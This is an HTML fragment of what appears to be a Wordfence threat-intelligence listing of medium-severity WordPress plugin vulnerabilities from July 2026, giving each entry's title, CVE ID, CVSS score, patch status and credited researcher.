					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-9341" target="_blank" rel="noopener noreferrer">							CVE-2026-9341						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 13, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/academy" target="_blank" rel="noopener">Academy LMS</a> <span class="wfvr-software-slug">[academy]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/arya-prasetyo" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4c713783cef57ea8eeef5b9a8f58c34b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4c713783cef57ea8eeef5b9a8f58c34b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/arya-prasetyo" target="_blank" rel="noopener">sorawautsukushiii</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1e9b094a-29ba-4be3-9033-fd915fae1820" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/12c7661c-0700-4370-9272-d8a19b17006e" target="_blank" rel="noopener">Catch Themes Demo Import &lt;= 3.3 &#8211; Missing Authorization to Authenticated (Subscriber+) Single Plugin Installation via &#8216;activate_plugin&#8217; Parameter</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15336" target="_blank" rel="noopener noreferrer">							CVE-2026-15336						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 15, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/catch-themes-demo-import" target="_blank" rel="noopener">Catch Themes Demo Import</a> <span class="wfvr-software-slug">[catch-themes-demo-import]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/12c7661c-0700-4370-9272-d8a19b17006e" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1a6ba67d-d10d-4590-8398-26b29c044fb3" target="_blank" rel="noopener">ERP: Complete HR, Accounting &amp; CRM Suite Built for WooCommerce &lt;= 1.17.5 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-59522" target="_blank" rel="noopener noreferrer">							CVE-2026-59522						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 15, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/erp" target="_blank" rel="noopener">ERP: Complete HR, Accounting &amp; CRM Suite Built for WooCommerce</a> <span class="wfvr-software-slug">[erp]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
									<strong>Researcher(s):</strong> Unknown
							</div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1a6ba67d-d10d-4590-8398-26b29c044fb3" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0c943b6b-9b54-4569-a027-11571f152b6c" target="_blank" rel="noopener">ERP: Complete HR, Accounting &amp; CRM Suite Built for WooCommerce &lt;= 1.17.6 &#8211; Missing Authorization to Authenticated (Subscriber+) Arbitrary Company Location Creation via wp_ajax_erp-company-location AJAX Handler</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15349" target="_blank" rel="noopener noreferrer">							CVE-2026-15349						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/erp" target="_blank" rel="noopener">ERP: Complete HR, Accounting &amp; CRM Suite Built for WooCommerce</a> <span class="wfvr-software-slug">[erp]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0c943b6b-9b54-4569-a027-11571f152b6c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/718d7ea3-d8ba-46a0-9ab1-72657bd82c17" target="_blank" rel="noopener">HubSpot All-In-One Marketing &lt;= 11.3.62 &#8211; Authenticated (Contributor+) Sensitive Information Exposure via Block Editor Localized Script</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-9656" target="_blank" rel="noopener noreferrer">							CVE-2026-9656						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/leadin" target="_blank" rel="noopener">HubSpot All-In-One Marketing – Forms, Popups, Live Chat</a> <span class="wfvr-software-slug">[leadin]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/duc-anh-chu" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/33751fc657c409bebde901e7bad75981.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="33751fc657c409bebde901e7bad75981"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/duc-anh-chu" target="_blank" rel="noopener">anhcd05</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/718d7ea3-d8ba-46a0-9ab1-72657bd82c17" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a2b2dd36-eca8-4d80-80f5-783f9402dd3c" target="_blank" rel="noopener">Landing Page Builder &lt;= 1.5.3.6 &#8211; Cross-Site Request Forgery to ulpb_admin_data AJAX Action</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-12409" target="_blank" rel="noopener noreferrer">							CVE-2026-12409						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 15, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/page-builder-add" target="_blank" rel="noopener">Landing Page Builder – Coming Soon page, Maintenance Mode, Lead Page, WordPress Landing Pages</a> <span class="wfvr-software-slug">[page-builder-add]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mfahad-khan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/686db6b846e085e9cdc3265bfe37f0ad.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="686db6b846e085e9cdc3265bfe37f0ad"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mfahad-khan" target="_blank" rel="noopener">M.Fahad Khan</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a2b2dd36-eca8-4d80-80f5-783f9402dd3c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3477baf1-71ef-44f3-938f-3e7d710e9df6" target="_blank" rel="noopener">List category posts &lt;= 0.95.0 &#8211; Missing Authorization to Authenticated (Contributor+) Sensitive Information Exposure via &#8216;post_status&#8217; Shortcode Attribute</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-12434" target="_blank" rel="noopener noreferrer">							CVE-2026-12434						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 15, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/list-category-posts" target="_blank" rel="noopener">List category posts</a> <span class="wfvr-software-slug">[list-category-posts]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researchers</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/salih-utku-telis" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/cdd08c78865e3018da0048c2af00e893.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="cdd08c78865e3018da0048c2af00e893"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/salih-utku-telis" target="_blank" rel="noopener">Salih Utku Telis</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/niyht" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/fd4ed1a2a7e43bffd9e64b482de48e9f.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="fd4ed1a2a7e43bffd9e64b482de48e9f"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/niyht" target="_blank" rel="noopener">Niyht</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3477baf1-71ef-44f3-938f-3e7d710e9df6" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/783ccf21-db16-4aac-9a3c-992b3aac5526" target="_blank" rel="noopener">Ninja Forms &#8211; Excel Export &lt;= 3.3.6 &#8211; Insecure Direct Object Reference to Authenticated (Subscriber+) Sensitive Data Disclosure via &#8216;spreadsheet_export_form_id&#8217; Parameter</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15159" target="_blank" rel="noopener noreferrer">							CVE-2026-15159						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ninja-forms-excel-export" target="_blank" rel="noopener">Ninja Forms &#8211; Excel Export</a> <span class="wfvr-software-slug">[ninja-forms-excel-export]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mai-chu-thao" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/68bf83ddc4a547f6935e2ad92922ee09.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="68bf83ddc4a547f6935e2ad92922ee09"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mai-chu-thao" target="_blank" rel="noopener">Chu Thao Mai</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/783ccf21-db16-4aac-9a3c-992b3aac5526" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/24fb24cc-c29f-4d2d-87ba-5d211386e7dd" target="_blank" rel="noopener">Ninja Forms &#8211; Excel Export &lt;= 3.3.6 &#8211; Missing Authorization to Authenticated (Subscriber+) XLS Write via Path Traversal</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15160" target="_blank" rel="noopener noreferrer">							CVE-2026-15160						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ninja-forms-excel-export" target="_blank" rel="noopener">Ninja Forms &#8211; Excel Export</a> <span class="wfvr-software-slug">[ninja-forms-excel-export]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mai-chu-thao" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/68bf83ddc4a547f6935e2ad92922ee09.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="68bf83ddc4a547f6935e2ad92922ee09"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mai-chu-thao" target="_blank" rel="noopener">Chu Thao Mai</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/24fb24cc-c29f-4d2d-87ba-5d211386e7dd" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9ed24d24-e899-4850-8552-4f6cf45fa467" target="_blank" rel="noopener">Notifima – WooCommerce Stock Manager, Inventory Management, Waitlist &lt;= 3.0.6 &#8211; Authenticated (Subscriber+) Sensitive Information Exposure</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-61945" target="_blank" rel="noopener noreferrer">							CVE-2026-61945						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woocommerce-product-stock-alert" target="_blank" rel="noopener">Notifima – WooCommerce Stock Manager, Inventory Management, Waitlist</a> <span class="wfvr-software-slug">[woocommerce-product-stock-alert]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d36a048c5f4fe8795a861da6334611fa.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d36a048c5f4fe8795a861da6334611fa"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener">Jakub Herman</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9ed24d24-e899-4850-8552-4f6cf45fa467" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a782d975-74ce-4265-9312-435b3585a5c6" target="_blank" rel="noopener">Smart Slider 3 &lt;= 3.5.1.37 &#8211; Missing Authorization to Authenticated (Contributor+) Sensitive Information Exposure via WP_Query Parameter Injection via &#8216;keyword&#8217; Parameter</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-12385" target="_blank" rel="noopener noreferrer">							CVE-2026-12385						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 13, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/smart-slider-3" target="_blank" rel="noopener">Smart Slider 3</a> <span class="wfvr-software-slug">[smart-slider-3]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yuvraj-tomar" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/788ce00791f8b922ca94d1aa28ff9618.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="788ce00791f8b922ca94d1aa28ff9618"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yuvraj-tomar" target="_blank" rel="noopener">Yuvraj Tomar</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a782d975-74ce-4265-9312-435b3585a5c6" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5a9943b5-0f6d-4fbd-97eb-df61acd0c297" target="_blank" rel="noopener">The Cache Purger &lt;= 2.3.20 &#8211; Missing Authorization to Authenticated (Subscriber+) Arbitrary Log Deletion via &#8216;the_log_purge&#8217; Parameter</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15350" target="_blank" rel="noopener noreferrer">							CVE-2026-15350						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 15, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/the-cache-purger" target="_blank" rel="noopener">The Cache Purger</a> <span class="wfvr-software-slug">[the-cache-purger]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5a9943b5-0f6d-4fbd-97eb-df61acd0c297" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b59e2773-31f0-4c19-b066-30982761bc44" target="_blank" rel="noopener">Themify Builder &lt;= 7.7.7 &#8211; Missing Authorization to Authenticated (Subscriber+) Arbitrary Post Stylesheet Write/Delete via tb_generate_on_fly AJAX Action</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15407" target="_blank" rel="noopener noreferrer">							CVE-2026-15407						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 15, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/themify-builder" target="_blank" rel="noopener">Themify Builder</a> <span class="wfvr-software-slug">[themify-builder]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b59e2773-31f0-4c19-b066-30982761bc44" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b99ba627-1d24-4be1-a4db-ff39354526f2" target="_blank" rel="noopener">W3SC Elementor to Zoho CRM &lt;= 2.2.0 &#8211; Cross-Site Request Forgery to Settings Update</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-9734" target="_blank" rel="noopener noreferrer">							CVE-2026-9734						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/w3sc-elementor-to-zoho" target="_blank" rel="noopener">W3SC Elementor to Zoho CRM</a> <span class="wfvr-software-slug">[w3sc-elementor-to-zoho]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/swat-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/2400719fbf58ba13f3eda25084096ad3.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2400719fbf58ba13f3eda25084096ad3"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/swat-2" target="_blank" rel="noopener">swat</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b99ba627-1d24-4be1-a4db-ff39354526f2" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
